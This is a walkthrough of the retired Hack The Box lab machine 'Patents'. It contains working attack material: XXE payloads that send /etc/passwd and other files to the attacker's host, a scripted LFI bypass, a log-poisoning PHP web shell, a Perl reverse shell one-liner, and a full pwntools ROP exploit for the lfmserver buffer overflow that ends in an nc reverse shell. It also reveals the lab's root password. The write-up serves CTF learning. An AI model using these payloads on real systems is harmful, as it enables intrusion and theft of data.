This post documents the complete walkthrough of Patents, a retired vulnerable VM created by gbyolo, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Patents is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.173 --rate=700

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-20 02:12:39 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.173
Discovered open port 80/tcp on 10.10.10.173
Discovered open port 8888/tcp on 10.10.10.173

Other than the usual ports, port 8888/tcp sure looks interesting. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p22,80,8888 -A --reason 10.10.10.173 -oN nmap.txt
...
PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 63 OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 39:b6:84:a7:a7:f3:c2:4f:38:db:fc:2a:dd:26:4e:67 (RSA)
|   256 b1:cd:18:c7:1d:df:57:c1:d2:61:31:89:9e:11:f5:65 (ECDSA)
|_  256 73:37:88:6a:2e:b8:01:4e:65:f7:f8:5e:47:f6:10:c4 (ED25519)
80/tcp   open  http            syn-ack ttl 62 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 57E2685CB1CD9B0F1ADA444F3CFF20C6
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: MEOW Inc. - Patents Management
8888/tcp open  sun-answerbook? syn-ack ttl 63
| fingerprint-strings:
|   Help, LPDString, LSCP:
|_    LFM 400 BAD REQUEST
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.80%I=7%D=1/21%Time=5E269A82%P=x86_64-pc-linux-gnu%r(LS
SF:CP,17,"LFM\x20400\x20BAD\x20REQUEST\r\n\r\n")%r(Help,17,"LFM\x20400\x20
SF:BAD\x20REQUEST\r\n\r\n")%r(LPDString,17,"LFM\x20400\x20BAD\x20REQUEST\r
SF:\n\r\n");

Hmm. nmap is not saying much on the mysterious open port. Anyway, this is how the site looks like.

Directory/File Enumeration

Let’s see what we can glean from wfuzz and quickhits.txt from SecLists.

# wfuzz -w quickhits.txt -t 100 --hc '403,404' http://10.10.10.173/FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.173/FUZZ
Total requests: 2439

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000071:   200        7 L      28 W     6148 Ch     "/.DS_Store"
000000934:   200        1 L      0 W      1 Ch        "/config.php"
000002261:   200        120 L    353 W    5528 Ch     "/upload.html"
000002262:   200        16 L     73 W     589 Ch      "/upload.php"

Total time: 9.380824
Processed Requests: 2439
Filtered Requests: 2435
Requests/sec.: 259.9984

Hmm, .DS_Store. Someone is using Mac? Anyways, looks like we have two versions of an uploading feature.

upload.html

upload.php

Having said that, both files are pointing to the same convert.php.

upload.html

upload.php

Let’s switch gears to another wordlist and see what we can discover this time.

# wfuzz -w common.txt -t 100 --hc '403,404' http://10.10.10.173/FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.173/FUZZ
Total requests: 4652

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000002148:   200        340 L    770 W    12548 Ch    "index"
000002150:   200        340 L    770 W    12548 Ch    "index.html"
000002913:   301        9 L      28 W     313 Ch      "output"
000002971:   301        9 L      28 W     314 Ch      "patents"
000003251:   200        437 L    986 W    16064 Ch    "profile"
000003428:   301        9 L      28 W     314 Ch      "release"
000003894:   301        9 L      28 W     313 Ch      "static"
000004243:   200        120 L    353 W    5528 Ch     "upload"
000004252:   301        9 L      28 W     314 Ch      "uploads"
000004320:   301        9 L      28 W     313 Ch      "vendor"

Total time: 13.41015
Processed Requests: 4652
Filtered Requests: 4642
Requests/sec.: 346.9012

Ok. This time round we have some directories (the 301s). Let’s try quickhits.txt on /vendor.

# wfuzz -w quickhits.txt -t 100 --hc '403,404' http://10.10.10.173/vendor/FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.173/vendor/FUZZ
Total requests: 2439

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000900:   200        848 L    1549 W   26980 Ch    "/composer/installed.json"

Total time: 10.21482
Processed Requests: 2439
Filtered Requests: 2438
Requests/sec.: 238.7706

Interesting. What have we here? Composer is used and installed.json contains the external PHP packages installed.

# curl -s http://10.10.10.173/vendor/composer/installed.json | jq '.[] | {name}' | tr -d '{}' | sed -r '/^$/d' | cut -d':' -f2 | tr -d '" '
gears/di
gears/pdf
gears/string
google/apiclient
icecave/parity
icecave/repr
ircmaxell/password-compat
jakoch/phantomjs-installer
paragonie/random_compat
symfony/filesystem
symfony/intl
symfony/polyfill
symfony/polyfill-ctype
symfony/process
voku/portable-utf8

Long story short, a hint from the creator was needed to get that initial foothold.

After testing several wordlists from the raft series in SecLists, I managed to stumble upon the right one.

# wfuzz -w raft-large-words.txt -t 100 --hc '403,404' http://10.10.10.173/release/FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.173/release/FUZZ
Total requests: 119600

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000076827:   200        17 L     104 W    758 Ch      "UpdateDetails"

Total time: 342.9610
Processed Requests: 119600
Filtered Requests: 119599
Requests/sec.: 348.7276

Something about entity parsing in the custom folder caught my eye. If I had to guess, I would say it means that XXE injection is possible in Microsoft Office Word’s custom XML.

XXE Injection

Let’s give it a shot. Here’s my game plan.

  1. First, we create an empty DOCX file with a custom XML part. Note that the XML must be valid.
  2. Inject XXE payload.
  3. Upload to test.
  4. Repeat step 2 for different payloads.

Create DOCX file with custom XML part

Easy. Refer to this video.

XXE payload

You can see that a customXml folder is present in the DOCX file.

Extract it out like so.

# 7z e test.docx customXml

Inject a XXE payload with a text editor.

# vi customXml/item1.xml

Update the DOCX file with the changes.

# zip -u test.docx -r customXml/

Upload to test

What you see above is the blind XXE where we try to load a remote resource. In our case, that remote resource is from my SimpleHTTPServer. The objective is to see if we are able to solicit any kind of response from the server.

Awesome.

XXE OOB with DTD and PHP filter

Now, let’s move on to the next payload: XXE OOB with DTD and PHP filter.

dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.75/dtd.xml?%data;'>">

See what’s displayed on my SimpleHTTPServer.

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.173 - - [25/Jan/2020 05:46:26] "GET /dtd.xml HTTP/1.0" 200 -
10.10.10.173 - - [25/Jan/2020 05:46:26] "GET /dtd.xml?cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9hcHQ6eDoxMDA6NjU1MzQ6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpnYnlvbG86eDoxMDAwOjEwMDA6Oi9ob21lL2dieW9sbzovYmluL2Jhc2gK HTTP/1.0" 200 -

base64-encoded /etc/passwd from the server, which is decoded to:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
gbyolo:x:1000:1000::/home/gbyolo:/bin/bash

With that in mind, let’s write a simple shell script to exfiltrate any file we have read permissions on. Notice I’m chaining PHP filters to reduce the size.

exfil.sh
#!/bin/bash

HOST=10.10.10.173
URL="http://$HOST/convert.php"
FILE=$1

cat <<EOF > dtd.xml
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=$FILE">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.75/dtd.xml?%data;'>">
EOF

curl -s \
     -H "Expect: " \
     -F "[email protected];type=application/vnd.openxmlformats-officedocument.wordprocessingml.document" \
     -F "submit=Generate pdf" \
     -o /dev/null \
     $URL

I’m also piping my SimpleHTTPServer output to the following to display only the pertinent information.

# python -m SimpleHTTPServer 80 2>&1 | stdbuf -o0 grep -Eo 'dtd\.xml\?.* ' | stdbuf -o0 cut -d' ' -f1 | stdbuf -o0 cut -c9-

Let’s exfiltrate config.php.

Here, I’m using CyberChef to reconstruct the actual file back. Looks like we have a purposely-named file that prevents discovery by any wordlists.

getPatent_alphav1.0.php
<?php

//error_reporting(E_ALL);
//ini_set('display_errors', 1);
//header("Content-type: text/plain");

require __DIR__ . '/vendor/autoload.php';

include('config.php');

use Gears;

$uploaddir = 'uploads/';

?>
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
        <link rel="shortcut icon" type="image/x-icon" href="static/assets/img/favicon.png">
        <title>Upload - MEOW Inc. - Patents Management Management</title>
		<link href="https://fonts.googleapis.com/css?family=Montserrat:300,400,500,600,700" rel="stylesheet">
        <link rel="stylesheet" type="text/css" href="static/assets/css/bootstrap.min.css">
		<link rel="stylesheet" type="text/css" href="static/assets/css/line-awesome.min.css">
		<link rel="stylesheet" type="text/css" href="static/assets/css/dataTables.bootstrap.min.css">
        <link rel="stylesheet" type="text/css" href="static/assets/css/font-awesome.min.css">
        <link rel="stylesheet" type="text/css" href="static/assets/css/style.css">
		<!--[if lt IE 9]>
			<script src="static/assets/js/html5shiv.min.js"></script>
			<script src="static/assets/js/respond.min.js"></script>
		<![endif]-->
    </head>
    <body>
        <div class="main-wrapper">
            <div class="header">
                <div class="header-left">
                    <a href="index.html" class="logo">
						<img src="static/assets/img/logo.png" width="50" height="50" alt="">
					</a>
                </div>
				<a id="toggle_btn" href="javascript:void(0);"><i class="la la-bars"></i></a>
                <div class="page-title-box pull-left">
					<h3>MEOW Inc. - Patents Management</h3>
                </div>
				<a id="mobile_btn" class="mobile_btn pull-left" href="#sidebar"><i class="fa fa-bars" aria-hidden="true"></i></a>
				<ul class="nav navbar-nav navbar-right user-menu pull-right">
					<li class="dropdown">
						<a href="profile.html" class="dropdown-toggle user-link" data-toggle="dropdown" title="Admin">
							<span class="user-img"><img class="img-circle" src="static/assets/img/user.jpg" width="40" alt="Admin">
							<span class="status online"></span></span>
							<span>Ajeje Brazorf</span>
							<i class="caret"></i>
						</a>
						<ul class="dropdown-menu">
							<li><a href="profile.html">My Profile</a></li>
							<li><a href="edit-profile.html">Edit Profile</a></li>
						</ul>
					</li>
				</ul>
				<div class="dropdown mobile-user-menu pull-right">
					<a href="#" class="dropdown-toggle" data-toggle="dropdown" aria-expanded="false"><i class="fa fa-ellipsis-v"></i></a>
					<ul class="dropdown-menu pull-right">
						<li><a href="profile.html">My Profile</a></li>
						<li><a href="edit-profile.html">Edit Profile</a></li>
					</ul>
				</div>
            </div>
            <div class="sidebar" id="sidebar">
                <div class="sidebar-inner slimscroll">
					<div id="sidebar-menu" class="sidebar-menu">
						<ul>
							<li class="submenu">
								<a href="#" class="noti-dot"><i class="la la-user"></i> <span> Patents</span> <span class="menu-arrow"></span></a>
								<ul style="display: none;">
									<li><a href="index.html">All Patents</a></li>
									<li><a href="upload.html">Upload patent</a></li>
								</ul>
							</li>
						</ul>
					</div>
                </div>
            </div>
            <div class="page-wrapper">
                <div class="content container-fluid center">
                	<div class="row">
                		<div class="col-sm-8">
                			<h4 class="page-title">Read a patent</h4>
                		</div>
                	</div>
                	<div class="row">
                		<div class="col">
                			<span></span>
                		</div>
                	</div>
                	<div class="row">
                		<div class="col">
                			<span>Here you can read submitted patents. Being it an experimental feature yet, read your patents using <pre>?id=#ID_OF_YOUR_PATENT.</pre></span>
                		</div>
                	</div>

						<?php
							if (isset($_GET["id"])) {
							    $id = $_GET["id"];
							    $file = str_replace("../","",PATENTS_DIR . $id);  
							    echo "<div class=\"row mt-3\"> <div class=\"col\">";
						            echo "<span>ID: $id</span></div> <div class=\"col\">";
							    echo " <pre>";
							    include(__DIR__ . $file);
							    echo "</pre></div></div>";
							}
						?>
                </div>
            </div>
        </div>
		<div class="sidebar-overlay" data-reff="#sidebar"></div>
        <script type="text/javascript" src="static/assets/js/jquery-3.2.1.min.js"></script>
        <script type="text/javascript" src="static/assets/js/bootstrap.min.js"></script>
		<script type="text/javascript" src="static/assets/js/jquery.dataTables.min.js"></script>
		<script type="text/javascript" src="static/assets/js/dataTables.bootstrap.min.js"></script>
		<script type="text/javascript" src="static/assets/js/jquery.slimscroll.js"></script>
		<script type="text/javascript" src="static/assets/js/app.js"></script>
    </body>
</html>

Directory Traversal and Local File Inclusion Vulnerability

Looks like there’s a directory traversal and LFI vulnerability with the id parameter in getPatent_alphav1.0.php. After all, gbyolo is right to say that str_replace is not a real fix. Armed with this insight, let’s write another shell script to exploit the LFI vulnerability to read files.

lfi.sh
#!/bin/bash

HOST=10.10.10.173
FILE=$1
URL="http://$HOST/getPatent_alphav1.0.php?id=....//....//....//....//....//$FILE"

curl -s \
     $URL \
| sed '/<pre>/,/<\/pre>/!d' \
| sed 1,4d \
| xmllint --recover --xpath "//pre" - 2>/dev/null \
| sed -r 's/<\/?pre\/?>//g'

Notice how I was able to bypass str_replace() to achieve directory traversal? Now, let’s see if we can access files that will allow log poisoning later on. For brevity’s sake, I was able to access /var/log/apache/error.log for log poisoning.

I poisoned it with the following command:

# curl -H "Referer: <?php phpinfo(); ?>" http://10.10.10.173/dipshit.php

And you should get something like this.

Remote Command Execution

Next up, let’s see if we can get remote command execution from log poisoning with the following:

# curl -H "Referer: <style type='text/css'>body { background-color: black; } #dipshit { background-color: white; color: black; }</style><div id='dipshit'><pre><?php echo shell_exec(\$_GET[0]); ?></pre></div>" http://10.10.10.173/dipshit.php

If everything went well, we should see something like this responding to the following URL.

http://10.10.10.173/getPatent_alphav1.0.php?id=....//....//....//....//....///var/log/apache2/error.log&0=id

Low-Privileged Shell

Time to get that shell with a Perl one-liner.

perl -e 'use Socket;$i="10.10.14.75";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Finally but the euphoria didn’t last long because the user.txt is held by root and the web server is hosted in a docker container.

Which means that we need to find the root’s password on this docker container. :angry:

Process monitoring with pspy64

Hmm. gbyolo is not as security conscious as we thought! Armed with the root’s password (!gby0l0r0ck$$!), we can easily get user.txt.

Privilege Escalation

At long last we have some information about the mysterious open port 8888/tcp, other than getting “LFM 400 BAD REQUEST” with everything thrown at it.

checker.py
#!/usr/bin/env python
import sys
import os
from utils import md5,recvline
import socket

INPUTREQ = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n"

if len(sys.argv) != 5:
    print "Usage: " + sys.argv[0] + " <host>:<port> <user> <pass> <file>"
    exit(-1)

HOST = sys.argv[1]
var = HOST.split(":")

if len(var) != 2:
    print "Usage: " + sys.argv[0] + " <host>:<port> <user> <pass> <file>"
    exit(-1)

try:
    PORT = int(var[1])
except ValueError:
    print "Port number must be integer"
    exit(-1)

HOST = var[0]

#print "Connecting to " + HOST + ":" + str(PORT)

USER = sys.argv[2]

try:
    PASS = os.environ[sys.argv[3]]
except KeyError:
    print "Couldn't find such password"
    exit(-1)

FILE = sys.argv[4]

# At this point PASS is well-defined
base = os.path.basename(FILE)

try:
    md5sum = md5(FILE)
except IOError:
    print "File not found locally"
    exit(-1)

REALREQ = INPUTREQ.format(base, USER, PASS, md5sum)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))
s.sendall(REALREQ)
resp = s.recv(4096)
s.close()

#print resp

if "LFM 200 OK" in resp:
    #print "File OK, no need to download"
    exit(0)

if "404" in resp:
    print "File not found on server"
    exit(-1)

#print "File corrupted, need to download it"

REQ = "GET /{} LFM\r\n\r\n".format(base)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(REQ)
recvline(s)
recvline(s)
recvline(s)
resp = s.recv(8192)

#if resp[-1] == '\n':
#    resp = resp[:-1]
#
#if resp[-1] == '\r':
#    resp = resp[:-1]

s.close()

with open("{}.new".format(base), "wb") as f:
    f.write(resp)

print "{}.new".format(base)

Lightweight File Manager LFM Protocol

On top of that, during enumeration of gbyolo’s account, I notice the git repository to lfmserver’s source code.

Here’s some of the commit logs.

Checking out commit 1bbc51851 reveals the protocol.

Vulnerability Analysis of lfmserver

From the README above, it’s evident that if we are to exploit the LFM protocol, it must have something to do with the input, and we have three methods to play with, namely, CHECK, GET and PUT. However, looking at the source code for the LFM protocol implementation, we can’t find the handler for the respective methods.

Fret not. We have lfmserver; we can reverse-engineer the handlers. Long story short, the vulnerability lies in the handle_check function.

This is where (in handle_lfm_connection) we call the handle_check function. Right after we enter the function, we have a 160-byte buffer for storing the file path after URL decoding. I smell buffer overflow!

Controlling the offset to the return address

Here, I was able to control the offset to the return address with this little test script.

test.sh
#!/bin/bash

HOST="127.0.0.1"
PORT="8888"
USER="lfmserver_user"
PASS='!gby0l0r0ck$$!'
FILE=$1
TRAV="%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e"
MD5="$(md5sum $FILE | cut -d' ' -f1)"
PAY="$(perl -e 'print "A" x 107 . "B" x 6' | xxd -p | tr -d '\n' | sed -r 's/(..)/%\1/g')"

echo -ne "CHECK /${TRAV}${FILE}%00${PAY} LFM\r\nUSER=$USER\r\nPASSWORD=$PASS\r\n\r\n$MD5\n" \
| nc $HOST $PORT

Exploit Development of lfmserver

Before we go on, there’s an important information in commit a900ccf7 about the libc(7) used in compiling lfmserver. You can download it from here.

We can build upon our test script to develop an actual exploit for lfmserver with pwntools. Here’s my exploit code.

exploit.py
from pwn import *

# Context
context.binary = "./lfmserver"
libc = ELF("./libc.so.6")

# Connection information
host = "10.10.10.173"
port = 8888

# LFM authentication / md5sum
user      = "lfmserver_user"
password  = "!gby0l0r0ck$$!"
guarantee = "/proc/sys/kernel/randomize_va_space" # guaranteed to be same on both sides; ASLR is enabled
md5sum    = "26ab0db90d72e28ad0ba1e22ee510510"    # md5sum("/proc/sys/kernel/randomize_va_space")

def encode(string):
    return ''.join("%%%02x" % ord(c) for c in string)

def genrequest(payload):
	traversal     = "../../../../../.."
	offset_to_ret = "A" * 107

	filepath  = encode(traversal)
	filepath += guarantee + "%00"
	filepath += encode(offset_to_ret)
	filepath += encode(payload)

	request = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n".format(filepath, user, password, md5sum)
	return request

# ROPgadget --binary lfmserver
'''
0x0000000000405c4b : pop rdi ; ret
0x0000000000405c49 : pop rsi ; pop r15 ; ret
'''
pop_rdi_ret     = 0x405c4b
pop_rsi_pop_ret = 0x405c49
skip            = 0xdeadbeef

# Leak libc
r = remote(host, port)

rop  = ""
rop += p64(pop_rdi_ret)
rop += p64(6)
rop += p64(pop_rsi_pop_ret)
rop += p64(context.binary.got["dup2"])
rop += p64(skip)
rop += p64(context.binary.symbols["write"])

r.sendline(genrequest(rop))

leaked = r.recvall().split('\n')[4][1:7]
leaked = unpack(leaked, 48)
libc.address = leaked - libc.symbols["dup2"]

success("libc base: %s" % hex(libc.address))

# Time for shell
r = remote(host, port)

# dup2(6, 0), dup2(6, 1), dup2(6, 2)
payload = ""
for fd in range(3):
	payload += p64(pop_rdi_ret)
	payload += p64(6)
	payload += p64(pop_rsi_pop_ret)
	payload += p64(fd)
	payload += p64(skip)
	payload += p64(libc.symbols["dup2"])

# one_gadget libc.so.6
'''
0x50186 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x501e3 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x103f50 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
payload += p64(libc.address + 0x501e3) # found to work from trial-n-error

r.sendline(genrequest(payload))
r.sendline("rm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | nc 10.10.15.188 1234 >/tmp/p")

Let’s give it a shot. We need to set up a nc listener by the way because our payload is a reverse shell.

Awesome.

Getting root.txt

I got kicked hard in the nuts, this one. I ran all the docker images including the hidden ones thinking that root.txt in one of them. Boy, was I wrong! In the end, the real /root mount point was hidden from me because of the Linux filesystem hierarchy.

See? If I navigate to /root, I’m actually looking at /dev/sdb1. So, in order to get to /dev/sda2 mounted at /, I can mount /dev/sda2 at another location, e.g. /tmp/gbyolo.

With that, getting root.txt is easy.

:dancer: